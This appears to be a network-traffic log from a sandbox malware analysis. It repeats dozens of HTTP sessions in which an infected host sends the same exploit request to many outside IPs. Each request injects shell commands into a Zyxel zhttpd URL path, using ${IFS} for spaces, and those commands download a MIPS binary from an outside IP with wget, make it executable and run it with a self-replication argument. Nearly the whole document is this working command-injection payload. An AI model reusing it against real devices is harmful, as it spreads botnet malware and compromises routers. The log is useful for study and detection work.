                                                      Feb 2, 2024 06:35:47.511945963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2965192.168.2.145619085.133.128.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.511976004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2966192.168.2.1455258134.210.213.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512007952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2967192.168.2.1435940183.29.101.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512070894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2968192.168.2.1457370147.54.190.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512110949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2969192.168.2.1460234153.93.99.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512145996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2970192.168.2.1438486117.193.229.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512175083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2971192.168.2.1453946104.242.245.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512214899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2972192.168.2.144065057.177.26.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512233019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2973192.168.2.144082679.180.209.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512311935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2974192.168.2.145261093.68.99.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512343884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2975192.168.2.144821847.98.17.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512377024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2976192.168.2.1443978149.216.9.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512423992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2977192.168.2.1456958181.45.118.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512466908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2978192.168.2.1434498101.179.186.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512507915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2979192.168.2.145893672.195.237.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512538910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2980192.168.2.145384262.91.224.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512588024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2981192.168.2.144387093.191.215.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512617111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2982192.168.2.145444284.2.4.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512644053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2983192.168.2.1458772144.218.134.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512707949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2984192.168.2.1437698191.214.186.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512742996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2985192.168.2.144992868.253.142.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512777090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2986192.168.2.145992676.5.35.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512828112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2987192.168.2.144056044.48.183.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512875080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2988192.168.2.1436868111.8.125.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512923002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2989192.168.2.1456584194.226.119.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.512964010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2990192.168.2.1448842223.203.190.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513027906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2991192.168.2.1459594187.140.6.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513068914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2992192.168.2.146084690.100.149.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513107061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2993192.168.2.1440512210.119.194.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513150930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2994192.168.2.1453226205.178.243.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513190031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2995192.168.2.1444400177.109.163.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513240099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2996192.168.2.1438990193.29.52.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513279915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2997192.168.2.145812685.234.187.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513330936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2998192.168.2.1445236206.28.53.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513372898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2999192.168.2.1449494109.155.170.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513395071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3000192.168.2.1438178107.248.239.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513447046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3001192.168.2.1453660176.98.173.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513498068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3002192.168.2.1446530129.32.216.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513552904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3003192.168.2.143441292.28.71.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513600111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3004192.168.2.145614092.236.251.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513629913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3005192.168.2.1446682206.207.64.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513663054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3006192.168.2.1459326165.49.93.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513717890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3007192.168.2.1449558162.209.229.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513763905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3008192.168.2.1449030151.29.31.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513803005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3009192.168.2.1451986105.11.60.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513837099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3010192.168.2.1458460181.193.180.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513894081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3011192.168.2.1435814102.225.72.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513936043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3012192.168.2.1442526115.13.157.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.513981104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3013192.168.2.1442048181.220.235.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514012098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3014192.168.2.1458898147.222.162.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514041901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3015192.168.2.14458481.54.120.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514112949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3016192.168.2.1444372124.161.58.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514142990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3017192.168.2.145318260.148.234.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514190912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3018192.168.2.1459630173.142.137.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514220953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3019192.168.2.1447820109.86.3.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514282942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3020192.168.2.145351099.65.109.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514317989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3021192.168.2.145532853.25.174.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514344931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3022192.168.2.145420084.32.222.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514375925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3023192.168.2.1445908156.204.13.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514431953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3024192.168.2.145781249.16.236.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514467001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3025192.168.2.144709812.110.114.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514514923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3026192.168.2.144172668.30.123.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.514555931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3027192.168.2.1456374123.166.206.112443
                                                      TimestampBytes transferredDirectionData
